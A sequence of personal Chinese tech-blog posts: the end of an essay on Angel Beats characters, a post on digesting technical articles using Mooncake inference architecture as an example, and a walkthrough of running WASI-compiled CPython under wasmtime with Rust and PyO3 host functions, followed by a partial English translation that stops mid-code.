而女主仲村由理的故事更为惨痛，生前住在生活得很快乐的富裕家庭，有三个弟弟妹妹。一天下午，四名强盗趁双亲不在家时入室抢劫。她被强迫在家中找出值钱的东西，不然就每10分钟杀死她的一个弟弟妹妹，结果警察于30分钟后赶到——这时由理已经眼睁睁地看着弟妹三人依次被杀。 “そんな人生なんて、許せないじゃない”/“怎么能原谅这种人生”是她发出的怒吼

和音无类似于圣徒，由理从地狱归来的人设不太一样。雅美的生前的故事也很惨，但是她同样也没有放弃，生活在家暴与吵架中的贫苦家庭。被音乐所拯救，靠着一把在雨中的垃圾堆捡来的一把吉他在音乐的路上奔驰着，一心用音乐帮助更多的人。但是因为被一酒瓶子砸在脑袋上，脑出血导致脑梗塞，在失语症中度过残生。

雅美的故事可能会更让人在生活中找到一丝真切感，我们见到的很多乐队的主唱都有类似的成长环境。如果说音无和由理的故事离我们太远，那么雅美的故事可能会是我们所见证过的故事。而雅美在逆境中的坚持以及利用音乐给他人点亮的希望之火，也更容易让我们为之动容。

之前有人问过我“你真的觉得这个世界上有奥特曼存在吗”，我的回答是“是的，在我心里”

所以在这个版本中，我想用她所演唱的一首歌的歌词来让我们一起铭记住她。如果平行世界的雅美真的知道了这件事，我相信她也会很开心的

最后

用这首歌的另外一句歌词来作为本文的结尾吧

こんなにも汚れて丑い世界で, 出会えた奇迹にありがとう/向在如此肮脏丑陋的世界中, 相遇的奇迹致谢吧

Reference

[1]. https://github.com/apache/opendal/discussions/5303

[2]. https://www.bilibili.com/video/BV13x411a79f

[3]. https://www.youtube.com/watch?v=mlUCxND9EU8

好了，现在你的知识也是我的了.jpg

2024-12-06T18:00:00.000Z

最近给朋友介绍了一下我对于一些外部资料的吸收的经验。我想了想整理了下聊天记录，将我整个思路以博客的形式展现出来。希望能帮到看这篇博客的人。

正文

首先说明，我自己看过关于知识体系方法论的资料很少。本文描述的是我自己在这些年经过不断改良后觉得目前最适合我的一套方法，可能不适合所有人，仅供参考

我自己的宗旨是 “有些时候我不一定需要成为知识的生产者，而是成为知识的搬运者”

或者套用鸭子类型的一个描述就是“如果一个项目，你知道原理，理解细节，能完整的给别人分享其中的细节，那么这就是你做过的项目”

成为一个合格的知识搬运者，那么意味着你需要擅长或者说能较好的吸收一些外部资料。我自己将原则归纳为两点

摆正心态
知识迁移

这里我先要着重强调心态上的重要性，再开始去描述我们怎么样去做知识的迁移

我自己对于心态是这样的观点：很多人对于去内化别人的资料有一种潜在的耻辱性心态，大家在面对一些资料的时候，会下意识的有“这不是我做的”，“我好菜啊”，“好难懂”心态，而不是抱着“原来我可以这么做”，“原来我之前这么做是对的”，这个心态将决定了你知识吸收的效率。

在我们聊完心态的重要性后，我将以之前看到的一篇 Mooncake 分离式推理架构创新与实践的文章为例子，大致的描述我怎么样将一篇资料消化的

这篇文章比较清晰的介绍了 Mooncake 在一些场景下的面临的挑战和解决思路。我们现在来逐行拆分一些我消化过程中觉得关键的点

在继续之前，我将这个过程总结为

知识验证
平行迁移
知识增强
新领域启发

这四部曲，以及如果你在面对一些可能是你看来比较 naive 的资料，可能还会有一部分我称之为对抗性思路的过程，即你需要去思考，如果是你，你会怎么样做的比他好？

首先我们聊一下第一部分知识验证的过程

比如以上文提到的资料中这样一段资料

第一段

除了性能挑战，我们还需要在大规模推理时采用一些自动运维手段，以减少人力投入，专注于解决更重要的问题。为此，我们采取了以下措施:首先，我们实现了推理实例的快速切换和快速拉齐方法。由于显卡是容易损坏的硬件，我们有硬件巡检手段，能够在机器出现问题时快速隔离，并在一定时间内如果无法恢复则人工介入。其次，在深夜时段，推理压力不大时，我们会释放一部分空闲资源来执行一些长时间或离线的任务，这些任务对延迟不敏感，可以异步进行。或者将这些机器用于一些轻量级的训练任务，以避免资源闲置。

第二段

首先，针对 Prefill Cache Miss 的问题，关键在于机器 B 没有热请求的 KV Cache。我们的解决方案是采用 Prefil 到 Prefill 的 Cache Transfer。当机器 B 发现没有 KV Cache时，我们不选择重新计算，因为这会消耗大量时间，而是让机器 A 直接将 KV Cache 传输给机器 B。这样，机器 B 就可以打破恶性循环，减少 TTFT 压力，提高并行度。
其次，我们需要处理 Prefil 到 Decode 的传输，这使得我们的 RDMA 网络带宽使用非常频繁。因此，我们需要一个更优的 RDMA 传输方案。许多开源工具的实现可以达到 80GE的水平，但离理论上限还有一定距离。我们对 RDMA 传输进行了精细调整，使得传输速率可以达到 180GB 每秒，非常接近 200GB 的理论上限。

这两部分资料提到的有两个东西

自动化巡检
对于缓存系统的 Prefetch 预热

这一部分实际上是对于我已有知识的验证，我会去思考过去做过的自动化巡检系统中的一些细节（包括怎么样提升准确性，减少误报等关键点），以及验证我自己之前做过的一些缓存预热的手段。

当然实际上在看这一部分的时候还包含了一些知识的增强。比如在这个过程中我会去查询目前 RDMA 开源方案的一些瓶颈，同时去查阅一些调优的文章。这样确保即便我没做过 RDMA 相关的部分，我也能对这样一个知识领域有一些最基本的了解

OK，我们来看第二步，知识的平行迁移

我们总结了几个关键公式:
更低的推理成本 =更省的模型结构 + 更便宜的硬件
更便宜的 Long Context= 更快的 Attention 计算 + 更小的 KVCache
更便宜的 Generation =更大的 Batch Size+更 Decode 友好的并行方式
这里所说的更节省的模型结构，指的是在时间和显存上的优化。如果我们进一步拆分推理成本，会发现两个关键点:一是长上下文的 Prefil(预填充)，二是 Generation(生成)的成本。对于长上下文的预填充，我们知道 Attention(注意力机制)具有平方级的时间复杂度。随着上下文长度的增加，比如达到 64K或一兆，所需的时间也会呈平方级增长，这成为我们系统中非常关键的一部分。因此，我们需要对这种场景进行专门的优化。优化长上下文预填充后，我们发现从整体上看，生成的成本才是推理系统的主要成本。因为用户在对话过程中需要模型输出的字数越来越长，而生成是一个 Memory Bound 的过程。

这里是文章开头中介绍 Mooncake 这一套系统的背景。在我看来，这一段可能技术上可以吸收的点并不多。但是这一段包含了很不错的演讲分享技巧。

用简单清晰的公式去吸引观众的注意
用 “比如达到 64K或一兆，所需的时间也会呈平方级增长” 这样精炼而吸睛的描述去做一个关键点的突出

这一样一组技巧，我会直接吸收下来作为我自己后续演讲准备中的一些素材。我自己也会在脑海中构建一个场景，如果时间回到21年，我在阿里晋升答辩的时候，如果让我用现在的技巧去概括我过去一年在网关中做的一些关键工作，我会怎么样去概述。

OK，现在我们来看第三步，知识的增强

我们的优化工作带来了显著的收益，这些收益体现在几个关键指标上。首先，我们实现了TTFT 的 10 倍提升，这主要得益于 Cache Miss 的显著降低，目前我们能做到小于 10%的 Cache Miss 水平，大量的计算可以被重复利用。
其次，我们在 TBT 上获得了大约5 倍的提升。这主要归功于 decode 节点能够将 batchsize 增大两倍以上。如果我们采用 Prefi 和 Decode 混合部署的方式，Decode 节点的TVT(Time to Value)压力会比较大，因为需要在 Decode 之间插入 Prefil 的计算。但如果我们将 Prefi 和 Decode 分离， Decode 节点就不需要为 prefil 预留任何显存，从而可以增大 batch size。尽管如此，batch size 的增加也会导致 TBT 相应下降，因此在SLO 的限制下，我们最终只能达到两倍多的水平。
在总体吞吐量上 RPM 上，我们平均获得了 1.7 倍的提升，对于一些较简单的业务，提升甚至超过了 5 倍。这些成绩的取得，是因为我们挖掘了当前许多框架可能没有充分利用的硬件资源，例如基础架构的 RDMA 通信带宽、内存的容量和带宽，以及 OSS 或 SSD 等多级缓存工具。

我是一个做 infra 出身的 SRE，那么对于可观测性的渴望我是吸纳在骨子里的，在看到这一段 Mooncake 关键结果的描述的时候，我会去思考这样一些问题

他们的监控规模有多大？时序数据规模有多大？采用的什么方案？Prometheus 等开源结构能否满足这一套需求？
他们这种对于 cache 的访问场景是不是延时敏感的？如果是的话，要去监控 cache miss 等指标的 overhead 会有多大？

我会在我脑海中根据我已经有的信息，对我自己给自己提出的问题进行一次或者多次推演（通常我工作累了，会做一些类似的推演或者思考来换个脑子休息一下）。而其有机会的时候，我也会去请教作者我思考过程中的一些问题（比如之前看一些论文或者内核 Patch 我有些思考都会直接去邮件沟通作者）。而不断的推演以及和同行不断的交流，实际上是对于知识的一个正向的反馈过程。能够帮助你对你自己做过的东西理解的更深。

OK，现在我们来聊新领域的启发

以前面的例子为例，整篇文章中反复提到了他们利用 RDMA 所做的一些事情。而这一块其实是我知识的盲区所在。所以我会去做以下这一样一些探索

明确 RDMA 目前的发展的一些状况
找一到两篇关于 RDMA 的论文进行粗读
找一到两篇公开的分享来了解 RDMA 在业界的一些落地概况

我自己日常的场景离 RDMA 可能有不少的 GAP。但是这样一些新领域的探索不仅能让我对 RDMA 有一些最基本的认知。也能让我去对行业头部的发展有一些理性的认识。

在我看来，知识消化其实就是不断的从你觉得有用的资料中重复这四部曲的过程。你需要基于你已有的知识框架去做一些推演，做一些思考。最终，别人的知识也可以成为你的知识.jpg

“我们不是知识的生产者，我们是知识的搬运工.jpg”

总结

差不多就这样吧，希望这篇文章能帮到大家

如何使用 WASMTIME 来运行 CPython for WASI，然后利用 Python 实现的 HostFunction 来扩展它？

2024-10-02T13:00:00.000Z

国庆节搞了一个活，利用 wasmtime 来执行编译成 WASM/WASI 字节码的 CPython 虚拟机，并在宿主机一侧利用 Python 实现的 Host Function 来扩展它。

再次声明一下，这个只是我个人想搞的活，没有再任何生产环境中得到验证，just for fun（XDDD

正文

首先我们简单介绍一下 WASM/WASI，这里我直接引用一下 AI 生成的 brief summary

WebAssembly (WASM) 是一种低级编程语言,可在现代网页浏览器中运行。它提供接近原生的性能。
WebAssembly System Interface (WASI) 是 WASM 的一个标准扩展,允许 WASM 程序在浏览器外运行,访问系统资源。
这两项技术旨在提高 Web 应用性能,并使 WASM 在更多环境中可用。

而 WASM/WASI 技术路线核心的优势在于

跨平台的兼容性
多语言通过静态编译的支持
Native Sandbox 带来的安全性

所以 WASM/WASI 不仅在浏览器得到了广泛的应用，现在其应用也逐渐扩展到了服务端。Serverless Compute，Database UDF， Gateway Plugin 等场景都在逐渐的铺开。

在最近在梳理 CPython 代码的时候，我突然有了一个想法，就是如果我用 WASM/WASI Runtime 来运行 CPython，然后在宿主机一侧利用 Python 实现的 Host Function 来扩展它，这样似乎能对一些比如允许用户上传自定义代码的数据 PaaS 这样的场景有所帮助。当然更主要的原因是这个 idea 貌似很好玩。

在我们继续往下走之前，我们感谢一个人，Brett Cannon，他几乎以一己之力，完成了 CPython WASM/WASI 的支持。快跟我说谢谢 Brett Cannon ！

CPython 整体的 WASM/WASI 演进路线如下

最早于21年11月，通过 emscripten 支持了 WASM，参见 BPO-40280¹
在2023年6月成为官方支持的 Tier3 平台（或者更早?）
在2024年3月，成为官方支持的 Tier2 平台，参见 GH-116314²
从 Python 3.13 开始，传统的 emscripten 方式的 WASM/WASI 支持将被放弃

OK，那么我们先来将 CPython 编译为 WASM/WASI 字节码，这里需要提前 setup 你的环境，确保安装 WASI-SDK。这里我为了省事，直接使用官方提供的 devcontainer 来进行所有的操作

我们使用 vscode setup 好 devcontainer 后，我们执行 python3 Tools/wasm/wasi.py build -- --config-cache --with-pydebug 便可以编译了，这里为了省事，我将原本 wasi.py 设定的先提前预编译一遍 CPython 的部分给去除了


def build_all(context):
    """Build everything."""
    steps = [
            #configure_build_python,
            #make_build_python,
            configure_wasi_python,
            make_wasi_python
        ]

在编译完成后，我们使用 cross-build/wasm32-wasi/python.sh 就可以运行我们的 CPython 了，这里实际上是 wrap 了一下 WASMTIME 的命令

1
2

#!/bin/sh
exec /usr/local/bin/wasmtime run --wasm max-wasm-stack=16777216 --wasi preview2 --dir /workspaces/cpython-wasi::/ --env PYTHONPATH=/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug /workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm "$@"

这里我们可以看到，官方的推荐的 WASM/WASI Runtime 是 wasmtime，那么我们用 wasmtime 进行接下来的工作

由于我们后续想用 Host Function 来扩展这一套流程，所以我们将 bash 的部分重写一下，最开始我使用的是 wasmtime 的 Python binding，大致的代码如下

from wasmtime import Linker, Engine, Store, WasiConfig, Module, FuncType, ValType, _bindings, Config
import sys

def test_wasi():
    linker = Linker(Engine())
    linker.define_wasi()
    with open("/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm", "rb") as file:
        module = Module(linker.engine, file.read())
    def foor_bar(a, b):
        return a + b
    linker.define_func("demo", "demo", FuncType([ValType.i32(),ValType.i32()],[ValType.i32()]), foor_bar)
    store = Store(linker.engine)
    config = Config()
    _bindings.wasmtime_config_max_wasm_stack_set(config.ptr(), 16777216)
    wasi_config = WasiConfig()
    # wasi_config.stdin_file = sys.stdin.fileno()
    # wasi_config.stdout_file = sys.stdout.fileno()
    # wasi_config.stderr_file = sys.stderr.fileno()
    wasi_config.env = [["PYTHONPATH", "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug"]]
    wasi_config.inherit_stdout()
    wasi_config.inherit_stderr()
    wasi_config.inherit_stdin()
    wasi_config.preopen_dir("/workspaces/cpython-wasi","/")
    store.set_wasi(wasi_config)

    instance=linker.instantiate(store, module)
    instance.exports(store)["_start"](store)

test_wasi()

由于 wasmtime 的 Python binding 是直接走 ctype 的一套封装，很多 config 选项没有在对外暴露的 API 里（比如代码里使用的 wasmtime_config_max_wasm_stack_set 来处理 WASM 的 stack），导致很多操作需要使用没暴露的私有 API，太过于 tricky，所以我选择重新用 Rust 来实现这一套操作

use wasmtime::*;
use wasmtime_wasi::preview1::{self};
use wasmtime_wasi::WasiCtxBuilder;
fn main() {
    let mut config = Config::new();
    config.max_wasm_stack(16777216);
    match Engine::new(&config) {
        Ok(engine) => {
            let mut linker = Linker::new(&engine);
            preview1::add_to_linker_sync(&mut linker, |t| t).unwrap();
            linker.allow_unknown_exports(true);
            let mut builder = WasiCtxBuilder::new();
            builder.inherit_stdio();
            builder.env(
                "PYTHONPATH",
                "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug",
            );
            builder
                .preopened_dir(
                    "/workspaces/cpython-wasi",
                    "/",
                    wasmtime_wasi::DirPerms::all(),
                    wasmtime_wasi::FilePerms::all(),
                )
                .unwrap();
            builder.args(&["--", "--version"]);
            let wasi_ctx = builder.build_p1();
            let mut store = Store::new(&engine, wasi_ctx);
            let module = Module::from_file(
                &engine,
                "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm",
            )
            .unwrap();
            let instance = linker.instantiate(&mut store, &module).unwrap();
            let run = instance
                .get_typed_func::<(), ()>(&mut store, "_start")
                .unwrap();
            run.call(&mut store, ()).unwrap();
            return;
        }
        Err(e) => {
            println!("Error creating engine: {:?}", e);
            return;
        }
    }
}

然后我们执行代码，成功！

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.81s
     Running `target/release/wasmtime-demo`
Python 3.14.0a0

现在我们来扩展我们的 CPython。首先声明，由于 dlopen 在 WASM/WASI for CPython 中没有得到支持，所以我们需要更改 Python 的本体部分

首先，我们在 Python 的 Modules 目录下面新增一个文件，命名为 demo.c，内容如下

#include 

extern int demo(int a, int b) {
return a + b;
}
static PyObject *
foo_bar(PyObject *self, PyObject *args)
{
Py_INCREF(PyExc_TypeError);
return PyLong_FromLong((long) demo(1, 2));
}

static PyMethodDef foomethods[] = {
{"bar", foo_bar, METH_VARARGS, ""},
{NULL, NULL, 0, NULL},
};

static PyModuleDef foomodule = {
PyModuleDef_HEAD_INIT,
.m_name = "demo",
.m_doc = "foo test module",
.m_size = -1,
.m_methods = foomethods,
};

PyMODINIT_FUNC
PyInit_demo(void)
{
return PyModule_Create(&foomodule);
}

然后我们在 Modules/Setup.bootstrap.in 中加入一行

1	demo demo.c

接着重新执行命令 python3 Tools/wasm/wasi.py build -- --config-cache --with-pydebug，生成新的 WASM/WASI 字节码。接着我们将前面的 Rust 代码中，args 的部分改为 ["--", "-c", "import demo; print(demo.bar())"]，然后重新执行代码，成功！

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.73s
     Running `target/release/wasmtime-demo`
3

现在，我们有了一个扩展模块，demo.c，但是问题是，我们现在的 demo.c 中核心的 demo 函数是 hardcode 在代码中。那么我们需要处理一下这里

通常来说，在常规的经验下，我们可以将函数的实现和定义分离开，这样方便动态链接。WASM/WASI 的也是类似，不过需要额外的处理

extern int demo(int a, int b) __attribute__((
    __import_module__("demo"),
    __import_name__("demo"),
));

这里我们是通过扩展的宏定义，在编译期的时候告诉编译器，demo 函数是从 demo 模块中导入的。这样我们就可以在后续的 Host Function 中，根据约定进行扩展了

然后我们需要修改一下 CPython 的编译脚本，给编译参数添加上 -Wextra -Wl,--allow-undefined

接着重新执行 python3 Tools/wasm/wasi.py build -- --config-cache --with-pydebug，生成新的 WASM/WASI 字节码。这个时候我们可以先执行 python.sh 一下，我们会得到报错

Error: failed to run main module `/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm`

Caused by:
    0: failed to instantiate "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm"
    1: unknown import: `demo::demo` has not been defined

符合预期。

那么我们现在来重新处理下我们的 Rust 代码

use wasmtime::*;
use wasmtime_wasi::preview1::{self};
use wasmtime_wasi::WasiCtxBuilder;
fn main() {
    let mut config = Config::new();
    config.max_wasm_stack(16777216);
    match Engine::new(&config) {
        Ok(engine) => {
            let mut linker = Linker::new(&engine);
            preview1::add_to_linker_sync(&mut linker, |t| t).unwrap();
            linker
                .func_wrap("demo", "demo", |a: i32, b: i32| {
                    (a+b)*10
                })
                .unwrap();
            linker.allow_unknown_exports(true);
            let mut builder = WasiCtxBuilder::new();
            builder.inherit_stdio();
            builder.env(
                "PYTHONPATH",
                "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug",
            );
            builder
                .preopened_dir(
                    "/workspaces/cpython-wasi",
                    "/",
                    wasmtime_wasi::DirPerms::all(),
                    wasmtime_wasi::FilePerms::all(),
                )
                .unwrap();
            builder.args(&["--", "-c", "import demo; print(demo.bar())"]);
            let wasi_ctx = builder.build_p1();
            let mut store = Store::new(&engine, wasi_ctx);
            let module = Module::from_file(
                &engine,
                "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm",
            )
            .unwrap();
            let instance = linker.instantiate(&mut store, &module).unwrap();
            let run = instance
                .get_typed_func::<(), ()>(&mut store, "_start")
                .unwrap();
            run.call(&mut store, ()).unwrap();
            return;
        }
        Err(e) => {
            println!("Error creating engine: {:?}", e);
            return;
        }
    }
}

执行一下，得到结果

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.79s
     Running `target/release/wasmtime-demo`
30

符合预期。

好了，现在我们支持了 Host Fucntion，我们可以在遵守函数签名的情况下，任意修改我们的逻辑。但是你还记得本文的标题吗？我们想执行 Python 实现的 Host Function。emmmm 虽然有一点绕，但也不是不可以，我们直接祭出 PyO3，更改 Rust 代码如下

use pyo3::prelude::*;
use pyo3::types::PyTuple;
use wasmtime::*;
use wasmtime_wasi::preview1::{self};
use wasmtime_wasi::WasiCtxBuilder;
fn main() {
    let mut config = Config::new();
    config.max_wasm_stack(16777216);
    match Engine::new(&config) {
        Ok(engine) => {
            let mut linker = Linker::new(&engine);
            preview1::add_to_linker_sync(&mut linker, |t| t).unwrap();
            linker
                .func_wrap("demo", "demo", |a: i32, b: i32| {
                    Python::with_gil(|py| {
                        let fun: Py = PyModule::from_code_bound(
                            py,
                            "def example(*args, **kwargs):
                                return (args[0] + args[1])*11",
                            "",
                            "",
                        )
                        .unwrap()
                        .getattr("example")
                        .unwrap()
                        .into();
                        let args = PyTuple::new_bound(py, &[a, b]);
                        // cast following to int

                        fun.call1(py, args).unwrap().extract::<i32>(py).unwrap()
                    })
                })
                .unwrap();
            linker.allow_unknown_exports(true);
            let mut builder = WasiCtxBuilder::new();
            builder.inherit_stdio();
            builder.env(
                "PYTHONPATH",
                "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug",
            );
            builder
                .preopened_dir(
                    "/workspaces/cpython-wasi",
                    "/",
                    wasmtime_wasi::DirPerms::all(),
                    wasmtime_wasi::FilePerms::all(),
                )
                .unwrap();
            builder.args(&["--", "-c", "import demo; print(demo.bar())"]);
            let wasi_ctx = builder.build_p1();
            let mut store = Store::new(&engine, wasi_ctx);
            let module = Module::from_file(
                &engine,
                "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm",
            )
            .unwrap();
            let instance = linker.instantiate(&mut store, &module).unwrap();
            let run = instance
                .get_typed_func::<(), ()>(&mut store, "_start")
                .unwrap();
            run.call(&mut store, ()).unwrap();
            return;
        }
        Err(e) => {
            println!("Error creating engine: {:?}", e);
            return;
        }
    }
}

然后执行一下，得到结果

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.75s
     Running `target/release/wasmtime-demo`
33

OK，我们成功了！

总结

本文实际上是一个技术路线的 PoC，验证了特定情况下，将 Python 和 WASI 结合的可能性，但是目前也暴露出一些问题

dlopen 支持的缺乏导致需要魔改 CPython runtime 本身的代码，不过根据 Brett Cannon 博客中提供的信息，有人 hack 了这一块代码提供了支持。感觉后续可以 follow up 一下
wasmtime Python binding 实在是太难用了，其实可以考虑直接基于 PyO3 进行一次封装
利用 Rust 来处理 wasmtime ，PyO3 调用 Python 代码目前存在的问题是 Python VM 对象没法跨线程共享，可能需要自己基于 Rust 封装一套类似 Golang 这样的 channel 的思路来复用虚拟机和传递数据

不过总体来说，这个 PoC 还是很有意思的，希朋友们也能玩的开心

参考

[1]. https://bugs.python.org/issue40280

[2]. https://github.com/python/cpython/issues/116314

How to Run CPython for WASI Using WASMTIME and Extend It with Python-Implemented Host Functions?

2024-10-02T13:00:00.000Z

During the National Day holiday, I worked on a project to use wasmtime to execute CPython virtual machine compiled into WASM/WASI bytecode, and extend it with Host Functions implemented in Python on the host side.

I’d like to clarify again that this is just a personal project I wanted to work on, without any validation in production environments, just for fun (XDDD

Main Content

First, let’s briefly introduce WASM/WASI. Here, I’ll directly quote an AI-generated brief summary:

WebAssembly (WASM) is a low-level programming language that can run in modern web browsers. It provides near-native performance.
WebAssembly System Interface (WASI) is a standard extension of WASM that allows WASM programs to run outside the browser and access system resources.
These two technologies aim to improve Web application performance and make WASM available in more environments.

The core advantages of the WASM/WASI technology route are:

Cross-platform compatibility
Multi-language support through static compilation
Security brought by Native Sandbox

Therefore, WASM/WASI is not only widely used in browsers but is also gradually expanding to the server-side. Scenarios such as Serverless Compute, Database UDF, and Gateway Plugin are gradually being rolled out.

While reviewing CPython code recently, I suddenly had an idea: what if I use WASM/WASI Runtime to run CPython, and then extend it with Host Functions implemented in Python on the host side? This seems to be helpful for scenarios like data PaaS that allows users to upload custom code. Of course, the main reason is that this idea seems quite interesting.

Before we continue, let’s thank one person, Brett Cannon, who almost single-handedly completed the support for CPython WASM/WASI. Say thank you to Brett Cannon with me!

The overall WASM/WASI evolution route of CPython is as follows:

As early as November 2021, WASM was supported through emscripten, see BPO-40280¹
It became an officially supported Tier3 platform in June 2023 (or earlier?)
It became an officially supported Tier2 platform in March 2024, see GH-116314²
Starting from Python 3.13, the traditional emscripten method of WASM/WASI support will be abandoned

OK, let’s start by compiling CPython into WASM/WASI bytecode. You need to set up your environment in advance and make sure WASI-SDK is installed. To save time, I directly use the official devcontainer for all operations.

After setting up the devcontainer with vscode, we can compile by executing python3 Tools/wasm/wasi.py build -- --config-cache --with-pydebug. To save time, I removed the part in wasi.py that pre-compiles CPython:

def build_all(context):
    """Build everything."""
    steps = [
            #configure_build_python,
            #make_build_python,
            configure_wasi_python,
            make_wasi_python
        ]

After compilation, we can run our CPython using cross-build/wasm32-wasi/python.sh. This is actually a wrapper for the WASMTIME command:

1
2

#!/bin/sh
exec /usr/local/bin/wasmtime run --wasm max-wasm-stack=16777216 --wasi preview2 --dir /workspaces/cpython-wasi::/ --env PYTHONPATH=/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug /workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm "$@"

We can see that the officially recommended WASM/WASI Runtime is wasmtime, so we’ll use wasmtime for our next steps.

Since we want to use Host Functions to extend this process later, we’ll rewrite the bash part. Initially, I used wasmtime’s Python binding, and the code looked roughly like this:

from wasmtime import Linker, Engine, Store, WasiConfig, Module, FuncType, ValType, _bindings, Config
import sys

def test_wasi():
    linker = Linker(Engine())
    linker.define_wasi()
    with open("/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm", "rb") as file:
        module = Module(linker.engine, file.read())
    def foor_bar(a, b):
        return a + b
    linker.define_func("demo", "demo", FuncType([ValType.i32(),ValType.i32()],[ValType.i32()]), foor_bar)
    store = Store(linker.engine)
    config = Config()
    _bindings.wasmtime_config_max_wasm_stack_set(config.ptr(), 16777216)
    wasi_config = WasiConfig()
    # wasi_config.stdin_file = sys.stdin.fileno()
    # wasi_config.stdout_file = sys.stdout.fileno()
    # wasi_config.stderr_file = sys.stderr.fileno()
    wasi_config.env = [["PYTHONPATH", "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug"]]
    wasi_config.inherit_stdout()
    wasi_config.inherit_stderr()
    wasi_config.inherit_stdin()
    wasi_config.preopen_dir("/workspaces/cpython-wasi","/")
    store.set_wasi(wasi_config)

    instance=linker.instantiate(store, module)
    instance.exports(store)["_start"](store)

test_wasi()

Since wasmtime’s Python binding is a direct ctype wrapper, many config options are not exposed in the public API (such as using wasmtime_config_max_wasm_stack_set to handle WASM’s stack), which leads to many operations requiring the use of unexposed private APIs. This is too tricky, so I chose to reimplement this set of operations using Rust:

use wasmtime::*;
use wasmtime_wasi::preview1::{self};
use wasmtime_wasi::WasiCtxBuilder;
fn main() {
    let mut config = Config::new();
    config.max_wasm_stack(16777216);
    match Engine::new(&config) {
        Ok(engine) => {
            let mut linker = Linker::new(&engine);
            preview1::add_to_linker_sync(&mut linker, |t| t).unwrap();
            linker.allow_unknown_exports(true);
            let mut builder = WasiCtxBuilder::new();
            builder.inherit_stdio();
            builder.env(
                "PYTHONPATH",
                "/cross-build/wasm32-wasi/build/lib.wasi-wasm32-3.14-pydebug",
            );
            builder
                .preopened_dir(
                    "/workspaces/cpython-wasi",
                    "/",
                    wasmtime_wasi::DirPerms::all(),
                    wasmtime_wasi::FilePerms::all(),
                )
                .unwrap();
            builder.args(&["--", "--version"]);
            let wasi_ctx = builder.build_p1();
            let mut store = Store::new(&engine, wasi_ctx);
            let module = Module::from_file(
                &engine,
                "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm",
            )
            .unwrap();
            let instance = linker.instantiate(&mut store, &module).unwrap();
            let run = instance
                .get_typed_func::<(), ()>(&mut store, "_start")
                .unwrap();
            run.call(&mut store, ()).unwrap();
            return;
        }
        Err(e) => {
            println!("Error creating engine: {:?}", e);
            return;
        }
    }
}

Then we execute the code, success!

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.81s
     Running `target/release/wasmtime-demo`
Python 3.14.0a0

Now let’s extend our CPython. First, note that since dlopen is not supported in WASM/WASI for CPython, we need to modify the Python core itself.

First, we add a new file in Python’s Modules directory, named demo.c, with the following content:

#include 

extern int demo(int a, int b) {
return a + b;
}
static PyObject *
foo_bar(PyObject *self, PyObject *args)
{
Py_INCREF(PyExc_TypeError);
return PyLong_FromLong((long) demo(1, 2));
}

static PyMethodDef foomethods[] = {
{"bar", foo_bar, METH_VARARGS, ""},
{NULL, NULL, 0, NULL},
};

static PyModuleDef foomodule = {
PyModuleDef_HEAD_INIT,
.m_name = "demo",
.m_doc = "foo test module",
.m_size = -1,
.m_methods = foomethods,
};

PyMODINIT_FUNC
PyInit_demo(void)
{
return PyModule_Create(&foomodule);
}

Then we add a line in Modules/Setup.bootstrap.in:

1	demo demo.c

Next, we re-execute the command python3 Tools/wasm/wasi.py build -- --config-cache --with-pydebug to generate new WASM/WASI bytecode. Then we change the args part in our previous Rust code to ["--", "-c", "import demo; print(demo.bar())"], and re-execute the code, success!

[root@267e91be24fd wasmtime-demo]# cargo run --release
   Compiling wasmtime-demo v0.1.0 (/workspaces/wasmtime-demo)
    Finished `release` profile [optimized] target(s) in 1.73s
     Running `target/release/wasmtime-demo`
3

Now, we have an extension module, demo.c, but the problem is that the core demo function in our current demo.c is hardcoded. So we need to handle this.

Typically, in regular practice, we can separate the implementation and definition of functions to facilitate dynamic linking. WASM/WASI is similar, but requires additional handling:

extern int demo(int a, int b) __attribute__((
    __import_module__("demo"),
    __import_name__("demo"),
));

Here, we use extended macro definitions to tell the compiler at compile time that the demo function is imported from the demo module. This way, we can extend it in subsequent Host Functions according to the convention.

Then we need to modify CPython’s compilation script, adding -Wextra -Wl,--allow-undefined to the compilation parameters.

Next, re-execute python3 Tools/wasm/wasi.py build -- --config-cache --with-pydebug to generate new WASM/WASI bytecode. At this point, we can first execute python.sh, and we’ll get an error:

Error: failed to run main module `/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm`

Caused by:
    0: failed to instantiate "/workspaces/cpython-wasi/cross-build/wasm32-wasi/python.wasm"
    1: unknown import: `demo::demo` has not been defined

This is as expected.

So now let’s reprocess our Rust code:

use wasmtime::*;
use wasmtime_wasi::preview1::{self};
use wasmtime_wasi::WasiCtxBuilder;
fn main() {
    let mut config = Config::new();
    config.max_wasm_stack(16777216);
    match Engine::new(&config) {
        Ok(engine) => {
